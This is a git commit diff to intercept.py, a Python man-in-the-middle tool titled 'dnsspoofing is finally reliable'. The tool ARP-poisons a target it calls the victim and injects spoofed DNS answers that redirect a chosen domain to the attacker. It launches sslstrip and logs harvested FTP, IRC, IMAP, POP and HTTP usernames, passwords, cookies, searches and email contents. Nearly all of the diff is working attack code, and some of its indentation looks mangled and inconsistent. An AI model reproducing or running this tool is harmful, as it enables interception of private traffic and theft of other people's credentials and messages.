dnsspoofing is finally reliable

2025-07-07 05:22:11 -07:00 · 2013-10-28 16:51:10 -06:00 · 2013-10-28 16:51:10 -06:00 · 8c09a80019
commit 8c09a80019
parent 509049d824
1 changed files with 169 additions and 218 deletions
--- a/intercept.py
+++ b/intercept.py
@ -1,8 +1,6 @@
 #!/usr/bin/python
 '''
 ADD A DICTIONARY OF LOGINS AND PASSWORDS AND ON CTRL-C HAVE IT THROW ALL THE USERNAMES, PASSWORDS, AND SERVER TO OUTPUT
 MAKE DNSSPOOF RELIABLE
 ADD wifi-monitor TO IT IF NO -ip OPTION EXISTS
 '''
@ -32,9 +30,8 @@ parser.add_argument("-ip", "--ipaddress", help="Enter IP address of victim and s
 parser.add_argument("-d", "--driftnet", help="Open an xterm window with driftnet.", action="store_true")
 parser.add_argument("-s", "--sslstrip", help="Open an xterm window with sslstrip.", action="store_true")
 parser.add_argument("-v", "--verboseURL", help="Shows all URLs the victim visits but doesn't limit the URL to 150 characters like -u does.", action="store_true")
-parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument. This is a race condition with the router so this option is unreliable")
+parser.add_argument("-dns", "--dnsspoof", help="Spoof DNS responses of a specific domain. Enter domain after this argument.")
 parser.add_argument("-p", "--post", help="Print unsecured HTTP POST loads, IMAP/POP/FTP/IRC/HTTP usernames/passwords and incoming/outgoing emails. Will also decode base64 encrypted POP/IMAP passwords for you.", action="store_true")
 parser.add_argument("-w", "--write", help="Write to logfile intercept.log.txt in the current directory", action="store_true")
 parser.add_argument("-i", "--interface", help="Choose the interface to use. Default is the first one that shows up in `ip route`.")
 args = parser.parse_args()
@ -49,7 +46,6 @@ C  = '\033[36m' # cyan
 GR = '\033[37m' # gray
 T  = '\033[93m' # tan
 if args.write:
 logger = open('intercept.log.txt', 'w+')
 class Spoof():
@ -78,10 +74,10 @@ class Parser():
 	oldHTTPack = ''
 	oldHTTPload = ''
 	HTTPfragged = 0
 	mail_passwds = []
 	oldmailack = ''
 	oldmailload = ''
 	mailfragged = 0
 	sentMsgs = []
 	def start(self, payload):
 		try:
@ -90,16 +86,18 @@ class Parser():
 		except:
 			return
-		if pkt.haslayer(Raw) and pkt.haslayer(TCP):
+		IP_layer = pkt[IP]
 		IP_dst = pkt[IP].dst
 		IP_src = pkt[IP].src
 		if args.urlspy or args.post:
 			if pkt.haslayer(Raw):
 				if pkt.haslayer(TCP):
 					dport = pkt[TCP].dport
 					sport = pkt[TCP].sport
 					ack = pkt[TCP].ack
 			IP_dst = pkt[IP].dst
 			IP_src = pkt[IP].src
 					# Can't use repr if we're gzip deflating which will be necessary when code injection is added
 					load = repr(pkt[Raw].load)[1:-1]
 					mail_ports = [25, 26, 110, 143]
 			# Catch fragmented packets only if they're being sent from the victim to a web server
 					if dport in mail_ports or sport in mail_ports:
 						self.mailspy(load, dport, sport, IP_dst, IP_src, mail_ports, ack)
 					if dport == 6667 or sport == 6667:
@ -107,9 +105,31 @@ class Parser():
 					if dport == 21 or sport == 21:
 						self.ftp(load, IP_dst, IP_src)
 					if dport == 80 or sport == 80:
-				self.URL(load, ack, dport, sport, pkt)
+						self.URL(load, ack, dport, sport)
 		if args.dnsspoof or args.dnsspoofall:
 			if pkt.haslayer(DNSQR):
 				dport = pkt[UDP].dport
 				sport = pkt[UDP].sport
 				localIP = [x[4] for x in scapy.all.conf.route.routes if x[2] != '0.0.0.0'][0]
 				if dport == 53 or sport == 53:
 					dns_layer = pkt[DNS]
 					self.dnsspoof(dns_layer, IP_src, IP_dst, sport, dport, localIP, payload)
-	def URL(self, load, ack, dport, sport, pkt):
+	# Spoof DNS for a specific domain to point to your machine
 	def dnsspoof(self, dns_layer, IP_src, IP_dst, sport, dport, localIP, payload):
 		if args.dnsspoof:
 			if args.dnsspoof in dns_layer.qd.qname:
 				print G+'[+] DNS request for '+W+args.dnsspoof+G+' found; dropping packet and injecting spoofed one to '+W+localIP
 				logger.write('[+] DNS request for '+args.dnsspoof+' found; dropping packet and injecting spoofed one to '+localIP+'\n')
 				payload.set_verdict(nfqueue.NF_DROP)
 				print G+'[+] Dropped real DNS response. Injecting the spoofed packet sending victim to '+W+localIP
 				logger.write('[+] Dropped real DNS response. Injecting the spoofed packet sending victim to '+localIP+'\n')
 				p = IP(dst=IP_src, src=IP_dst)/UDP(dport=sport, sport=dport)/DNS(id=dns_layer.id, qr=1, aa=1, qd=dns_layer.qd, an=DNSRR(rrname=dns_layer.qd.qname, ttl=10, rdata=localIP))
 				send(p)
 				print G+'[!] Sent spoofed packet for '+W+args.dnsspoof
 				logger.write('[!] Sent spoofed packet for '+args.dnsspoof+'\n')
 	def URL(self, load, ack, dport, sport):
 		host = None
 		get = None
@ -135,9 +155,11 @@ class Parser():
 		# Split the packet between headers and body and grab the URL from the headers
 		# If you see any other login/pw variable names, tell me and I'll add em in here
-		# As it stands now this has a moderately high false positive rate; I figured better to err on the site of more data than less and it's easy to tell what's a real hit vs false positive
+		# As it stands now this has a moderately high false positive rate; I figured better to err on the site of more data than less
 		# email, user, username, name, login, log, loginID
 		user_regex = '([Ee]mail|[Uu]ser|[Uu]sername|[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[Ii][Dd])=([^&|;]*)'
-		pw_regex = '([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp]assw)=([^&|;]*)'
+		# password, pass, passwd, pwd, psw, passwrd, passw
 		pw_regex = '([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][Ss][Ww]|[Pp]asswrd|[Pp]assw)=([^&|;]*)'
 		header_lines = headers.split(r"\r\n")
 		for l in header_lines:
 			searchHost = re.search('[Hh]ost: ', l)
@ -156,23 +178,27 @@ class Parser():
 		if host and post:
 			url = host+post
-		# Catch search terms, print url, print post loads
+		# print urls
 		if url != None:
 			#Print the URL
 			if args.urlspy:
-				d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js']
+				d = ['.jpg', '.jpeg', '.gif', '.png', '.css', '.ico', '.js', '.svg', '.woff']
 				if any(i in url for i in d):
 					return
 				if len(url) > 146:
 					print '[*] '+url[:145]
 					logger.write('[*] '+url[:145]+'\n')
 				else:
 					print '[*] '+url
 					logger.write('[*] '+url+'\n')
 			if args.verboseURL:
 				print '[*] '+url
 				logger.write('[*] '+url+'\n')
 			# Catch search terms
 			# As it stands now this has a moderately high false positive rate mostly due to the very simple ?s= and ?q= vars
 			# I figured better to err on the site of more data than less and it's easy to tell the false positives from the real searches
 			# search, query, search?q, ?s, &q, ?q, search?p, keywords, command
 			searched = re.search('((search|query|search\?q|\?s|&q|\?q|search\?p|keywords|command)=([^&][^&]*))', url)
 			if searched:
 				searched = searched.group(3)
@ -181,13 +207,13 @@ class Parser():
 				else:
 					searched = searched.replace('+', ' ').replace('%20', ' ').replace('%3F', '?').replace('%27', '\'').replace('%40', '@').replace('%24', '$').replace('%3A', ':').replace('%3D', '=').replace('%22', '\"').replace('%24', '$')
 					print T+'[+] Searched '+W+host+T+': '+searched+W
-					if args.write:
+					logger.write('[+] Searched '+host+ ' for: '+searched+'\n')
 						logger.write('[+] Searched %s for: ' % host+searched+'\n')
 			#Print POST load
 			if post:
 				if 'ocsp' in url:
 					print B+'[+] POST: '+W+url
 					logger.write('[+] POST: '+url+'\n')
 				elif body != '':
 					try:
 						urlsplit = url.split('/')
@ -196,8 +222,10 @@ class Parser():
 						pass
 					if self.HTTPfragged == 1:
 						print B+'[+] Fragmented POST: '+W+url+B+" HTTP POST's combined load: "+body+W
 						logger.write('[+] Fragmented POST: '+url+" HTTP POST's combined load: "+body+'\n')
 					else:
 						print B+'[+] POST: '+W+url+B+' HTTP POST load: '+body+W
 						logger.write('[+] POST: '+url+" HTTP POST's combined load: "+body+'\n')
 					username = re.findall(user_regex, body)
 					password = re.findall(pw_regex, body)
 					self.user_pass(username, password)
@ -212,15 +240,12 @@ class Parser():
 		load = load.replace(r"\r\n", "")
 		if 'USER ' in load:
 			print R+'[!] FTP '+load+' SERVER: '+IP_dst+W
 			if args.write:
 			logger.write('[!] FTP '+load+' SERVER: '+IP_dst+'\n')
 		if 'PASS ' in load:
 			print R+'[!] FTP '+load+' SERVER: '+IP_dst+W
 			if args.write:
 			logger.write('[!] FTP '+load+' SERVER: '+IP_dst+'\n')
 		if 'authentication failed' in load:
 			print R+'[*] FTP '+load+W
 			if args.write:
 			logger.write('[*] FTP '+load+'\n')
 	def irc(self, load, dport, sport, IP_src):
@ -231,27 +256,22 @@ class Parser():
 						self.IRCnick = load[0].split('NICK ')[1]
 						server = load[1].replace('USER user user ', '').replace(' :user', '')
 						print R+'[!] IRC username: '+self.IRCnick+' on '+server+W
 						if args.write:
 						logger.write('[!] IRC username: '+self.IRCnick+' on '+server+'\n')
 					if 'NS IDENTIFY ' in load[0]:
 						ircpass = load[0].split('NS IDENTIFY ')[1]
 						print R+'[!] IRC password: '+ircpass+W
 						if args.write:
 						logger.write('[!] IRC password: '+ircpass+'\n')
 					if 'JOIN ' in load[0]:
 						join = load[0].split('JOIN ')[1]
 						print C+'[+] IRC joined: '+W+join
 						if args.write:
 						logger.write('[+] IRC joined: '+join+'\n')
 					if 'PART ' in load[0]:
 						part = load[0].split('PART ')[1]
 						print C+'[+] IRC left: '+W+part
 						if args.write:
 						logger.write('[+] IRC left: '+part+'\n')
 					if 'QUIT ' in load[0]:
 						quit = load[0].split('QUIT :')[1]
 						print C+'[+] IRC quit: '+W+quit
 						if args.write:
 						logger.write('[+] IRC quit: '+quit+'\n')
 				# Catch messages from the victim to an IRC channel
 				if 'PRIVMSG ' in load[0]:
@ -260,22 +280,20 @@ class Parser():
 						channel = load.split(' :', 1)[0]
 						ircmsg = load.split(' :', 1)[1]
 						if self.IRCnick != '':
-							print C+'[+] IRC '+W+self.IRCnick+C+' to '+W+channel+C+': '+ircmsg+W
+							print C+'[+] IRC victim '+W+self.IRCnick+C+' to '+W+channel+C+': '+ircmsg+W
 							if args.write:
 							logger.write('[+] IRC '+self.IRCnick+' to '+channel+': '+ircmsg+'\n')
 						else:
 							print C+'[+] IRC msg to '+W+channel+C+': '+ircmsg+W
 							if args.write:
 							logger.write('[+] IRC msg to '+channel+':'+ircmsg+'\n')
 					# Catch messages from others that tag the victim's nick
 					elif self.IRCnick in load[0] and self.IRCnick != '':
 						print 'self.ircnick is in load'
 						sender_nick = load[0].split(':', 1)[1].split('!', 1)[0]
 						try:
 							load = load[0].split('PRIVMSG ')[1].split(' :', 1)
 							channel = load[0]
 							ircmsg = load[1]
 							print C+'[+] IRC '+W+sender_nick+C+' to '+W+channel+C+': '+ircmsg[1:]+W
 							logger.write('[+] IRC '+sender_nick+' to '+channel+': '+ircmsg[1:]+'\n')
 						except:
 							return
@ -289,27 +307,23 @@ class Parser():
 				else:
 					self.Cookies.append(x)
 				print P+'[+] Cookie found for '+W+host+P+' logged in intercept.log.txt'+W
 				if args.write:
 				logger.write('[+] Cookie found for'+host+':'+x.replace('Cookie: ', '')+'\n')
 	def user_pass(self, username, password):
 		if username:
 			for u in username:
 				print R+'[!] Username found: '+u[1]+W
 				if args.write:
 				logger.write('[!] Username: '+u[1]+'\n')
 		if password:
 			for p in password:
 				if p[1] != '':
 					print R+'[!] Password: '+p[1]+W
 					if args.write:
 					logger.write('[!] Password: '+p[1]+'\n')
 	def mailspy(self, load, dport, sport, IP_dst, IP_src, mail_ports, ack):
 		# Catch fragmented mail packets
 		if dport in mail_ports or sport in mail_ports and load != '':
 		if ack == self.oldmailack:
 			if load != r'.\r\n':
 				self.oldmailload = self.oldmailload+load
 				load = self.oldmailload
 				self.mailfragged = 1
@ -337,13 +351,18 @@ class Parser():
 			self.incoming(headers, body, header_lines, email_headers, sport, dport)
 	def passwords(self, IP_src, load, dport, IP_dst):
 		# Get rid of all the hex at the beginning of the load
 		load = load.replace(r'\r\n', '')
 		if dport == 143 and IP_src == victimIP and len(load) > 15:
 			if self.IMAPauth == 1 and self.IMAPdest == IP_dst:
 				# Don't double output mail passwords
 				for x in self.mail_passwds:
 					if load in x:
 						self.IMAPauth = 0
 						self.IMAPdest = ''
 						return
 				print R+'[!] IMAP user and pass found: '+load+W
 				if args.write:
 				logger.write('[!] IMAP user and pass found: '+load+'\n')
 				self.mail_passwds.append(load)
 				self.decode(load, dport)
 				self.IMAPauth = 0
 				self.IMAPdest = ''
@ -352,9 +371,15 @@ class Parser():
 				self.IMAPdest = IP_dst
 		if dport == 110 and IP_src == victimIP:
 			if self.POPauth == 1 and self.POPdest == IP_dst and len(load) > 10:
 				# Don't double output mail passwords
 				for x in self.mail_passwds:
 					if load in x:
 						self.POPauth = 0
 						self.POPdest = ''
 						return
 				print R+'[!] POP user and pass found: '+load+W
 				if args.write:
 				logger.write('[!] POP user and pass found: '+load+'\n')
 				self.mail_passwds.append(load)
 				self.decode(load, dport)
 				self.POPauth = 0
 				self.POPdest = ''
@ -363,39 +388,42 @@ class Parser():
 				self.POPdest = IP_dst
 		if dport == 26:
 			if 'AUTH PLAIN ' in load:
-				print R+'[!] POP authentication found: '+load+W
+				# Don't double output mail passwords
-				if args.write:
+				for x in self.mail_passwds:
-					logger.write('[!] POP authentication found: '+load+'\n')
+					if load in x:
 						self.POPauth = 0
 						self.POPdest = ''
 						return
 				print R+'[!] Mail authentication found: '+load+W
 				logger.write('[!] Mail authentication found: '+load+'\n')
 				self.mail_passwds.append(load)
 				self.decode(load, dport)
 	def outgoing(self, headers, body, header_lines, email_headers, IP_src):
 		if 'Message-ID' in headers:
 			for l in header_lines:
 				# Don't double output sent messages
 				if 'Message-ID' in l:
 					if l in self.sentMsgs:
 						return
 					else:
 						self.sentMsgs.append(l)
 				for x in email_headers:
 					if x in l:
 						self.OheadersFound.append(l)
 			# if date, from, to in headers then print the message
 			if len(self.OheadersFound) > 3 and body != '':
 				if self.mailfragged == 1:
 					print O+'[!] OUTGOING MESSAGE (fragmented)'+W
 					logger.write('[!] OUTGOING MESSAGE (fragmented)\n')
 					for x in self.OheadersFound:
 						print O+'	',x+W
 						logger.write('	'+x+'\n')
 					print O+'	Message:',body+W
 					logger.write('	Message:'+body+'\n')
 				else:
 					print O+'[!] OUTGOING MESSAGE'+W
 				if args.write:
 					logger.write('[!] OUTGOING MESSAGE\n')
 					for x in self.OheadersFound:
 						print O+'	',x+W
 					if args.write:
 						logger.write('	'+x+'\n')
 				try:
 					body = body.split(r'\r\n\x')[0]
 					print O+'	Message:',body+W
 				except:
 					print O+'	[!] Could not parse message body'+W
 					pass
 				if args.write:
 					logger.write('	Message:'+body+'\n')
 		self.OheadersFound = []
 	def incoming(self, headers, body, header_lines, email_headers, sport, dport):
@ -413,15 +441,21 @@ class Parser():
 				except:
 					return
 			if message != '':
 				if self.mailfragged == 1:
 					print O+'[!] INCOMING MESSAGE (fragmented)'+W
 					logger.write('[!] INCOMING MESSAGE (fragmented)\n')
 					for x in self.IheadersFound:
 						print O+'	'+x+W
 						logger.write('	'+x+'\n')
 					print O+'	Message: '+message+W
 					logger.write('	Message: '+message+'\n')
 				else:
 					print O+'[!] INCOMING MESSAGE'+W
 				if args.write:
 					logger.write('[!] INCOMING MESSAGE\n')
 					for x in self.IheadersFound:
 						print O+'	'+x+W
 					if args.write:
 						logger.write('	'+x+'\n')
 					print O+'	Message: '+message+W
 				if args.write:
 					logger.write('	Message: '+message+'\n')
 		self.IheadersFound = []
@ -442,7 +476,6 @@ class Parser():
 		# Test to see if decode worked
 		if '@' in decoded:
 			print R+'[!] Decoded:'+decoded+W
 			if args.write:
 			logger.write('[!] Decoded:'+decoded+'\n')
 #Wrap the nfqueue object in an IReadDescriptor and run the process_pending function in a .doRead() of the twisted IReadDescriptor
@ -466,20 +499,9 @@ class Queued(object):
 class Threads():
 	def dnsspoof(self, victimIP):
 		while 1:
 			a=sniff(filter='port 53 and host %s' % victimIP, count=1, promisc=1)
 			DNSpkt = a[0]
 			if not DNSpkt.haslayer(DNSQR):
 				continue
 			if args.dnsspoof in DNSpkt.qd.qname:
 				send(mkspoof(DNSpkt))
 				print G + '[+] Spoofed:', DNSpkt.qd.qname + W
 	def sslstrip(self, DN):
 		print 'Redirecting traffic to port 10000 and starting sslstrip\n'
 		os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000')
 #		os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000')
 		xterm = ['xterm', '-e', 'sslstrip', '-f', '-w', 'sslstrip.txt']
 		Popen(xterm, stdout=PIPE, stderr=DN)
@ -487,7 +509,7 @@ class Threads():
 		xterm = ['xterm', '-e', 'driftnet', '-i', '%s' % interface]
 		Popen(xterm, stdout=PIPE, stderr=DN)
-	def start_threads(self, victimIP, interface, DN):#, victimMAC, routerMAC, routerIP):
+	def start_threads(self, interface, DN):
 		#start twisted reactor in thread
 		rt = Thread(target=reactor.run, args=(False,)) #reactor must be started without signal handling since it's not in the main thread
@ -502,10 +524,6 @@ class Threads():
 			ssl = Thread(target=self.sslstrip, args=(DN,))
 			ssl.daemon = True
 			ssl.start()
 		if args.dnsspoof:
 			dns = Thread(target=self.dnsspoof, args=(victimIP,))
 			dns.daemon = True
 			dns.start()
 #Print all the variables
 def print_vars(interface, DHCPsrvr, dnsIP, local_domain, routerIP, victimIP):
@ -514,7 +532,9 @@ def print_vars(interface, DHCPsrvr, dnsIP, local_domain, routerIP, victimIP):
 	print "[*] DNS server: " + dnsIP
 	print "[*] Local domain: " + local_domain
 	print "[*] Router IP: " + routerIP
-	print "[*] Client IP: " + victimIP
+	print "[*] victim IP: " + victimIP
 	logger.write("[*] Router IP: " + routerIP+'\n')
 	logger.write("[*] victim IP: " + victimIP+'\n')
 #Enable IP forwarding and flush possibly conflicting iptables rules
 def setup(DN, victimMAC):
@ -533,38 +553,16 @@ def setup(DN, victimMAC):
 #	os.system('iptables -t nat -A PREROUTING -p tcp -s %s -j NFQUEUE' % victimIP)
 #	os.system('iptables -t nat -A PREROUTING -p tcp -d %s -j NFQUEUE' % victimIP)
 	# Just throw packets that are from and to the victim into the reactor
-	os.system('iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,53,80,110,143,6667 -j NFQUEUE' % victimIP)
+	os.system('iptables -A FORWARD -p tcp -s %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
-	os.system('iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,53,80,110,143,6667 -j NFQUEUE' % victimIP)
+	os.system('iptables -A FORWARD -p tcp -d %s -m multiport --dports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
-	os.system('iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,53,80,110,143,6667 -j NFQUEUE' % victimIP)
+	os.system('iptables -A FORWARD -p tcp -s %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
-	os.system('iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,53,80,110,143,6667 -j NFQUEUE' % victimIP)
+	os.system('iptables -A FORWARD -p tcp -d %s -m multiport --sports 21,26,80,110,143,6667 -j NFQUEUE' % victimIP)
 	# To catch DNS packets you gotta do prerouting rather than forward for some reason?
 	os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')
 	print '[*] Forwarded traffic to the queue'
 def main():
-	#For use in URL_cb, mailspy respectively
+	global victimIP
 	global victimMAC, victimIP
 #	Cleans up if Ctrl-C is caught
 	def signal_handler(signal, frame):
 		print 'learing iptables, sending healing packets, and turning off IP forwarding...'
 		if args.write:
 			logger.close()
 		if args.dnsspoof:
 			q.unbind(socket.AF_INET)
 			q.close()
 		ipf = open('/proc/sys/net/ipv4/ip_forward', 'r+')
 		ipf.write('0\n')
 		ipf.close()
 		if not dnsIP == routerIP:
 			Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 			Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 		os.system('iptables -F')
 		os.system('iptables -X')
 		os.system('iptables -t nat -F')
 		os.system('iptables -t nat -X')
 		Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 		Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 		exit(0)
 	signal.signal(signal.SIGINT, signal_handler)
 	#Check if root
 	if not geteuid()==0:
@ -630,11 +628,13 @@ def main():
 	try:
 		routerMAC = Spoof().originalMAC(routerIP)
 		print "[*] Router MAC: " + routerMAC
 		logger.write("[*] Router MAC: "+routerMAC+'\n')
 	except:
 		exit("[!] Could not get router MAC address")
 	try:
 		victimMAC = Spoof().originalMAC(victimIP)
 		print "[*] Victim MAC: " + victimMAC
 		logger.write("[*] Victim MAC: "+routerMAC+'\n')
 	except:
 		exit("[!] Could not get victim MAC address")
 	if dnsIP != routerIP:
@ -649,7 +649,26 @@ def main():
 	setup(DN, victimMAC)
 	Queued()
 	th = Threads()
-	th.start_threads(victimIP, interface, DN)
+	th.start_threads(interface, DN)
 	# Cleans up if Ctrl-C is caught
 	def signal_handler(signal, frame):
 		print 'learing iptables, sending healing packets, and turning off IP forwarding...'
 		logger.close()
 		ipf = open('/proc/sys/net/ipv4/ip_forward', 'r+')
 		ipf.write('0\n')
 		ipf.close()
 		if not dnsIP == routerIP:
 			Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 			Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 		os.system('iptables -F')
 		os.system('iptables -X')
 		os.system('iptables -t nat -F')
 		os.system('iptables -t nat -X')
 		Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 		Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 		exit(0)
 	signal.signal(signal.SIGINT, signal_handler)
 	while 1:
 		#If DNS server is different from the router then we must spoof ourselves as the DNS server as well as the router
@ -660,71 +679,3 @@ def main():
 if __name__ == "__main__":
 	main()
 #	except select.error  as ex:
 #		if ex[0] == 4:
 #			pass
 #		else:
 #			raise
 #	Threads().start_threads(victimIP, interface, DN)#, victimMAC, routerMAC, routerIP)
 #	while 1:
 #		try:
 #			#If DNS server is different from the router then we must spoof ourselves as the DNS server as well as the router
 #			if not dnsIP == routerIP:
 #				Spoof().poison(dnsIP, victimIP, dnsMAC, victimMAC)
 #			Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
 #			time.sleep(1.5)
 #		except KeyboardInterrupt:
 #			print 'learing iptables, sending healing packets, and turning off IP forwarding...'
 #			if args.write:
 #				logger.close()
 #			if args.dnsspoof:
 #				q.unbind(socket.AF_INET)
 #				q.close()
 #			ipf = open('/proc/sys/net/ipv4/ip_forward', 'r+')
 #			ipf.write('0\n')
 #			ipf.close()
 #			if dnsIP != routerIP:
 #				Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 #				Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 #			Popen(['iptables', '-F'], stdout=PIPE, stderr=DN)
 #			Popen(['iptables', '-t', 'nat', '-F'], stdout=PIPE, stderr=DN)
 #			Popen(['iptables', '-X'], stdout=PIPE, stderr=DN)
 #			Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN)
 #			Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 #			Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 #			exit(0)
 #	while 1:
 #		continue
 #	reactor.run()
 #	while 1:
 #		try:
 #			#If DNS server is different from the router then we must spoof ourselves as the DNS server as well as the router
 #			if not dnsIP == routerIP:
 #				Spoof().poison(dnsIP, victimIP, dnsMAC, victimMAC)
 #			Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
 #			time.sleep(1.5)
 #		except KeyboardInterrupt:
 #			print 'learing iptables, sending healing packets, and turning off IP forwarding...'
 #			if args.write:
 #				logger.close()
 #			if args.dnsspoof:
 #				q.unbind(socket.AF_INET)
 #				q.close()
 #			ipf = open('/proc/sys/net/ipv4/ip_forward', 'r+')
 #			ipf.write('0\n')
 #			ipf.close()
 #			if dnsIP != routerIP:
 #				Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 #				Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
 #			Popen(['iptables', '-F'], stdout=PIPE, stderr=DN)
 #			Popen(['iptables', '-t', 'nat', '-F'], stdout=PIPE, stderr=DN)
 #			Popen(['iptables', '-X'], stdout=PIPE, stderr=DN)
 #			Popen(['iptables', '-t', 'nat', '-X'], stdout=PIPE, stderr=DN)
 #			Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 #			Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
 #			exit(0)